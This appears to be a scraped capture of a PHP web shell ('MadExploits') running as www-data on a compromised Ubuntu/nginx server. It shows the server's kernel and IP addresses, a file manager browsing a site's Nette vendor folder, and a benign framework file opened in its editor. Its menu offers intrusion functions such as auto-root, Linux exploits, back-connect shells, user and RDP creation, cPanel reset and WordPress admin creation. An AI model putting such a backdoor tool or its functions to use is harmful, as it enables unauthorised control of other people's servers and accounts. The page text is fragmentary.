Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
nepalphd /
vendor /
nette /
utils /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Iterators
[ DIR ]
drwxrwxr-x
Utils
[ DIR ]
drwxrwxr-x
HtmlStringable.php
335
B
-rwxrwxr-x
SmartObject.php
3.49
KB
-rwxrwxr-x
StaticClass.php
550
B
-rwxrwxr-x
Translator.php
428
B
-rwxrwxr-x
compatibility.php
686
B
-rwxrwxr-x
exceptions.php
2.2
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : StaticClass.php
<?php /** * This file is part of the Nette Framework (https://nette.org) * Copyright (c) 2004 David Grudl (https://davidgrudl.com) */ declare(strict_types=1); namespace Nette; /** * Static class. */ trait StaticClass { /** * Class is static and cannot be instantiated. */ private function __construct() { } /** * Call to undefined static method. * @throws MemberAccessException */ public static function __callStatic(string $name, array $args): mixed { Utils\ObjectHelpers::strictStaticCall(static::class, $name); } }
Close